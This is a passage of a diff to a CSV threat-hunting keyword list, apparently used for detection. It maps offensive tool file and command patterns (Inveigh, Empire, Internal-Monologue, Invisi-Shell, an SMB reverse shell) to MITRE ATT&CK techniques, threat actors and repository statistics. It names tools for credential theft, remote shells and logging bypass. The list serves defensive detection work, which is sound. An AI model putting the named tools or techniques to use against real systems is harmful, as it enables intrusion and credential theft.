Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*interactsh -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*.exe","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*oast.*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-client -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-server -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*Intercepter-NG*","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--interface * --wpad --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Internal-Monologue.exe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueDll*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueExe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" -"*InternetCrackUrl*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*IntruderPayloads*","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3429","1190","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" -"*-Inveigh *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Inveigh Relay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Inveigh.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*InternetCrackUrl*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*IntruderPayloads*","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3430","1189","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" +"*-Inveigh *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh Relay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*Inveigh.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh.psd1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh.psm1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh.sln*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*inveigh_version*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*inveigh_version*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Cleartext.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-FormInput.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-Log.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" @@ -11836,16 +11989,16 @@ "*Inveigh-net*.zip*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv1.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv2.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*-InveighRelay *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-InveighRelay *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Relay.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*inveighzero.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*InvisibilityCloak.py*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "*Invisi-Shell*","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1059 - T1053 - T1027 - T1055 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","921","143","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*invoke obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*invoke* -Action command -Execute * -Session*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" -"*Invoke-*WDigestDowngrade.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-*WDigestDowngrade.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*invoke_obfuscation.py*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"*invoke_sessiongopher.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*invoke_sessiongopher.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*Invoke-AccessCheckForAllGroups*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 